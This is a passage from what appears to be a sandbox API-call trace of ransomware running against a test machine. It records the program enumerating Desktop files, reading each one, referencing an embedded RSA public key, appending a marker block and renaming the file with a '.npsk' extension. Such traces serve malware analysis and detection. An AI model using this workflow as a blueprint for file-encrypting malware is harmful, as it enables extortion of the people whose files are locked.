liDistanceToMove=0x1861d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.275] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.275] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.275] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.275] CloseHandle (hObject=0x61c) returned 1 [0216.278] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\4ughhITY.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\4ughhity.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\4ughhITY.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\4ughhity.wav.npsk")) returned 1 [0216.279] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d48ffe0, ftCreationTime.dwHighDateTime=0x1d5e37d, ftLastAccessTime.dwLowDateTime=0x64d3fe50, ftLastAccessTime.dwHighDateTime=0x1d5d891, ftLastWriteTime.dwLowDateTime=0x64d3fe50, ftLastWriteTime.dwHighDateTime=0x1d5d891, nFileSizeHigh=0x0, nFileSizeLow=0x790f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6SABy5ii2eGNy.flv", cAlternateFileName="6SABY5~1.FLV")) returned 1 [0216.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\6SABy5ii2eGNy.flv") returned=".flv" [0216.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\6SABy5ii2eGNy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\6saby5ii2egny.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.280] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=30991) returned 1 [0216.280] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.282] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x78e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.282] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.283] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x790f, lpOverlapped=0x0) returned 1 [0216.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.284] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.285] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.285] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.285] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.285] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.285] GetLastError () returned 0x0 [0216.285] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.285] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.285] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.285] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.286] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.286] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.286] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x790f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.286] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.286] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.286] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.287] CloseHandle (hObject=0x61c) returned 1 [0216.287] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\6SABy5ii2eGNy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\6saby5ii2egny.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\6SABy5ii2eGNy.flv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\6saby5ii2egny.flv.npsk")) returned 1 [0216.289] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb000bdd0, ftCreationTime.dwHighDateTime=0x1d5de56, ftLastAccessTime.dwLowDateTime=0x66b7f940, ftLastAccessTime.dwHighDateTime=0x1d5d7d0, ftLastWriteTime.dwLowDateTime=0x66b7f940, ftLastWriteTime.dwHighDateTime=0x1d5d7d0, nFileSizeHigh=0x0, nFileSizeLow=0x8b85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="An4K.flv", cAlternateFileName="")) returned 1 [0216.289] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\An4K.flv") returned=".flv" [0216.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\An4K.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\an4k.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.289] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=35717) returned 1 [0216.289] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.291] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8b5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.291] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.292] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x8b85, lpOverlapped=0x0) returned 1 [0216.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.293] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.294] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.294] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.294] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.294] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.294] GetLastError () returned 0x0 [0216.294] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.294] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.294] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.294] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.294] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.294] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.295] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x8b85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.295] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.295] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.295] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.295] CloseHandle (hObject=0x61c) returned 1 [0216.297] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\An4K.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\an4k.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\An4K.flv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\an4k.flv.npsk")) returned 1 [0216.298] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ba9e3f0, ftCreationTime.dwHighDateTime=0x1d5deeb, ftLastAccessTime.dwLowDateTime=0x1b0553b0, ftLastAccessTime.dwHighDateTime=0x1d5dd4a, ftLastWriteTime.dwLowDateTime=0x1b0553b0, ftLastWriteTime.dwHighDateTime=0x1d5dd4a, nFileSizeHigh=0x0, nFileSizeLow=0x177ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eZq7CG3P6aq4buI.pdf", cAlternateFileName="EZQ7CG~1.PDF")) returned 1 [0216.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\eZq7CG3P6aq4buI.pdf") returned=".pdf" [0216.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\eZq7CG3P6aq4buI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\ezq7cg3p6aq4bui.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.299] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=96238) returned 1 [0216.299] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.301] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x177c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.301] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.303] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x177ee, lpOverlapped=0x0) returned 1 [0216.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.304] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.304] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.305] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.305] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.305] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.305] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.305] GetLastError () returned 0x0 [0216.305] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.305] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.305] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.305] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.305] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.306] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.306] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x177ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.306] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.306] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.306] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.307] CloseHandle (hObject=0x61c) returned 1 [0216.308] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\eZq7CG3P6aq4buI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\ezq7cg3p6aq4bui.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\eZq7CG3P6aq4buI.pdf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\ezq7cg3p6aq4bui.pdf.npsk")) returned 1 [0216.309] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd046360, ftCreationTime.dwHighDateTime=0x1d5d9bf, ftLastAccessTime.dwLowDateTime=0x3768f4f0, ftLastAccessTime.dwHighDateTime=0x1d5e3ec, ftLastWriteTime.dwLowDateTime=0x3768f4f0, ftLastWriteTime.dwHighDateTime=0x1d5e3ec, nFileSizeHigh=0x0, nFileSizeLow=0x13521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G6UpGZI.odp", cAlternateFileName="")) returned 1 [0216.309] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\G6UpGZI.odp") returned=".odp" [0216.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\G6UpGZI.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\g6upgzi.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.310] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=79137) returned 1 [0216.310] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.312] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x134fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.312] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.313] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x13521, lpOverlapped=0x0) returned 1 [0216.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.314] lstrlenA (lpString="-----BEGIN PUBLIC 